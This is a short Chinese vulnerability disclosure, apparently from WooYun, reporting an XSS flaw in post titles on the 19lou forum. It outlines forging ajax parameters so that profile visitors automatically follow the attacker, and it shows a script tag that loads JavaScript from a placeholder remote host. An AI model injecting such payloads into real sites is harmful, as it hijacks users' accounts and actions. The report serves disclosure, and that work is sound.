WooYun.org

这个XSS发现早于之前的“19楼持久xss一枚 ”。而忘记要邀请码了！这次主要是想获得邀请码！乌云给一个吧！谢谢！
上次漏洞反馈的url证明：http://www.wooyun.org/bugs/wooyun-2010-03358/trace/1dc8c788de0cb67559a876fdc06bf01e
发帖时，本地预览，标题出现XSS
开始觉得这个XSS算不上什么漏洞，所以就没发。昨天看了某些大牛的XSS攻击技巧，只要攻击代码写得好还是能造成危害的！这个XSS最主要的是容易被忽视！
攻击构想：站点使用ajax（这个文件static.19louimg.js），我们构造一个攻击程序，调用里面的ajax，同时伪造ajax中data ={'do':doaction,'fuid':fuid,'uid':currentUid};的fuid、currentUid；，就能使每个访问我空间首页的用户可能自动‘关注我’！比上一个XSS攻击代码构造要容易！
原因：上个XSS使用过滤程序与这个应该不是同一个，很多关键字都能在这里运行，而上一个不行！能调用远程站点文件，如：<script src='http://xxx.com/1.js' ></script>。复查一下过滤程序的代码吧！